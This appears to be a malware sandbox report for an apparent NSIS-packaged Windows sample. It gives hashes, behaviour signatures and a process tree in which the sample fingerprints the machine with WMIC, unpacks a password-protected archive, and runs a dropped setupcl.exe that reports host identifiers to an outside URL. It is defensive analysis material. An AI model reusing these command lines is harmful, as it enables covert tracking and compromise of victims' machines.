Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system -
submitted
16/06/2024, 12:48
Static task
static1
Behavioral task
behavioral1
Sample
b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
Resource
win7-20240611-en
Behavioral task
behavioral2
Sample
b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/7za.exe
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/7za.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240611-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240611-en
General
-
Target
b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
-
Size
406KB
-
MD5
b396063e909ca4c992a06cdbc2df0cd3
-
SHA1
258def0a71f12cadab512b9aade17446bced5373
-
SHA256
be535447f6baedc894f1bbd938733394c8b5ea43c5184e8c1643175e3e78a35a
-
SHA512
ea940af80aa6897ad54c20b8d55a6b25e7ca4b76fee0064eddb71c39ab287bc083c89598b08bb1e6819441a02994d1f8f805b52db89d9a72bed6250fbfb171f0
-
SSDEEP
12288:/A0i50GM1/EsSaaizIqHJNQbO4tYGbeNiro6:/AfyGEj7IqHDvEiNX6
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 2984 7za.exe 580 setupcl.exe -
Loads dropped DLL 8 IoCs
pid Process 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2688 WMIC.exe Token: SeSecurityPrivilege 2688 WMIC.exe Token: SeTakeOwnershipPrivilege 2688 WMIC.exe Token: SeLoadDriverPrivilege 2688 WMIC.exe Token: SeSystemProfilePrivilege 2688 WMIC.exe Token: SeSystemtimePrivilege 2688 WMIC.exe Token: SeProfSingleProcessPrivilege 2688 WMIC.exe Token: SeIncBasePriorityPrivilege 2688 WMIC.exe Token: SeCreatePagefilePrivilege 2688 WMIC.exe Token: SeBackupPrivilege 2688 WMIC.exe Token: SeRestorePrivilege 2688 WMIC.exe Token: SeShutdownPrivilege 2688 WMIC.exe Token: SeDebugPrivilege 2688 WMIC.exe Token: SeSystemEnvironmentPrivilege 2688 WMIC.exe Token: SeRemoteShutdownPrivilege 2688 WMIC.exe Token: SeUndockPrivilege 2688 WMIC.exe Token: SeManageVolumePrivilege 2688 WMIC.exe Token: 33 2688 WMIC.exe Token: 34 2688 WMIC.exe Token: 35 2688 WMIC.exe Token: SeIncreaseQuotaPrivilege 2688 WMIC.exe Token: SeSecurityPrivilege 2688 WMIC.exe Token: SeTakeOwnershipPrivilege 2688 WMIC.exe Token: SeLoadDriverPrivilege 2688 WMIC.exe Token: SeSystemProfilePrivilege 2688 WMIC.exe Token: SeSystemtimePrivilege 2688 WMIC.exe Token: SeProfSingleProcessPrivilege 2688 WMIC.exe Token: SeIncBasePriorityPrivilege 2688 WMIC.exe Token: SeCreatePagefilePrivilege 2688 WMIC.exe Token: SeBackupPrivilege 2688 WMIC.exe Token: SeRestorePrivilege 2688 WMIC.exe Token: SeShutdownPrivilege 2688 WMIC.exe Token: SeDebugPrivilege 2688 WMIC.exe Token: SeSystemEnvironmentPrivilege 2688 WMIC.exe Token: SeRemoteShutdownPrivilege 2688 WMIC.exe Token: SeUndockPrivilege 2688 WMIC.exe Token: SeManageVolumePrivilege 2688 WMIC.exe Token: 33 2688 WMIC.exe Token: 34 2688 WMIC.exe Token: 35 2688 WMIC.exe Token: SeIncreaseQuotaPrivilege 2656 WMIC.exe Token: SeSecurityPrivilege 2656 WMIC.exe Token: SeTakeOwnershipPrivilege 2656 WMIC.exe Token: SeLoadDriverPrivilege 2656 WMIC.exe Token: SeSystemProfilePrivilege 2656 WMIC.exe Token: SeSystemtimePrivilege 2656 WMIC.exe Token: SeProfSingleProcessPrivilege 2656 WMIC.exe Token: SeIncBasePriorityPrivilege 2656 WMIC.exe Token: SeCreatePagefilePrivilege 2656 WMIC.exe Token: SeBackupPrivilege 2656 WMIC.exe Token: SeRestorePrivilege 2656 WMIC.exe Token: SeShutdownPrivilege 2656 WMIC.exe Token: SeDebugPrivilege 2656 WMIC.exe Token: SeSystemEnvironmentPrivilege 2656 WMIC.exe Token: SeRemoteShutdownPrivilege 2656 WMIC.exe Token: SeUndockPrivilege 2656 WMIC.exe Token: SeManageVolumePrivilege 2656 WMIC.exe Token: 33 2656 WMIC.exe Token: 34 2656 WMIC.exe Token: 35 2656 WMIC.exe Token: SeIncreaseQuotaPrivilege 2656 WMIC.exe Token: SeSecurityPrivilege 2656 WMIC.exe Token: SeTakeOwnershipPrivilege 2656 WMIC.exe Token: SeLoadDriverPrivilege 2656 WMIC.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 580 setupcl.exe 580 setupcl.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 1696 wrote to memory of 2688 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 28 PID 1696 wrote to memory of 2688 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 28 PID 1696 wrote to memory of 2688 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 28 PID 1696 wrote to memory of 2688 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 28 PID 1696 wrote to memory of 2656 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 31 PID 1696 wrote to memory of 2656 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 31 PID 1696 wrote to memory of 2656 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 31 PID 1696 wrote to memory of 2656 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 31 PID 1696 wrote to memory of 2708 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 33 PID 1696 wrote to memory of 2708 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 33 PID 1696 wrote to memory of 2708 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 33 PID 1696 wrote to memory of 2708 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 33 PID 1696 wrote to memory of 2756 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 35 PID 1696 wrote to memory of 2756 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 35 PID 1696 wrote to memory of 2756 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 35 PID 1696 wrote to memory of 2756 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 35 PID 1696 wrote to memory of 2984 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 37 PID 1696 wrote to memory of 2984 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 37 PID 1696 wrote to memory of 2984 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 37 PID 1696 wrote to memory of 2984 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 37 PID 1696 wrote to memory of 580 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 39 PID 1696 wrote to memory of 580 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 39 PID 1696 wrote to memory of 580 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 39 PID 1696 wrote to memory of 580 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 39 PID 1696 wrote to memory of 580 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 39 PID 1696 wrote to memory of 580 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 39 PID 1696 wrote to memory of 580 1696 b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe 39 PID 580 wrote to memory of 2948 580 setupcl.exe 40 PID 580 wrote to memory of 2948 580 setupcl.exe 40 PID 580 wrote to memory of 2948 580 setupcl.exe 40 PID 580 wrote to memory of 2948 580 setupcl.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get UUID /FORMAT:textvaluelist.xsl2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC bios Get Version /FORMAT:textvaluelist.xsl2⤵PID:2708
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC csproduct Get Name /FORMAT:textvaluelist.xsl2⤵PID:2756
-
-
C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\7za.exe7za.exe e -y -p"4b4e0a8e25264cabf48c2fb5a66f7511" [RANDOM_STRING].7z2⤵
- Executes dropped EXE
PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe"C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe" /initurl http://sub.yorkshatb.com/init/b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118/:uid:? /affid "-" /id "0" /name " " /uniqid b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118 /uuid stance(s) Available. /biosserial /biosversion BOCHS - 1 /csname stance(s) Available.2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic bios get serialnumber, version3⤵PID:2948
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
80KB
MD5030704fec8e09f22541695badb27552d
SHA133dabb64be1a527e20819e516a1257ed3c10461f
SHA256284a9b6e90bd414133fb235c7ada9126790548eb6d1b32f43ceb78df6c6facd6
SHA51204977560a6f8fa1889e0c21afc1b7cfa802bfe221db0084cffabbd4dfffe14c31075cfa3d4618b6bffb6e625b3cb31680b9a2b9646cd1c5078a6405870bd44f6
-
Filesize
574KB
MD542badc1d2f03a8b1e4875740d3d49336
SHA1cee178da1fb05f99af7a3547093122893bd1eb46
SHA256c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
SHA5126bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c
-
Filesize
8KB
MD5b8be6632a7dc8136ff01338be40fe701
SHA1043fa16929b2af5ed5c1c59b4035a10cf765fb43
SHA256289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085
SHA512403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8
-
Filesize
193KB
MD510bd2af1b07ec6bc9cd17ba512569e59
SHA1807e17ab1b98177e135d30941b45081960d1e866
SHA2569c620ef6eac3d0d9d3f6f2622a53d1f543cebd93846636ba397683962c07fc7c
SHA512deacd041f12b6ec74f9e4488874ce962037990ed0ae424aaeabf2c35876b2ebbb943f92e9a4ffe504718bb00021209b035439ea4d7c64a4031b86ce9104ce3ed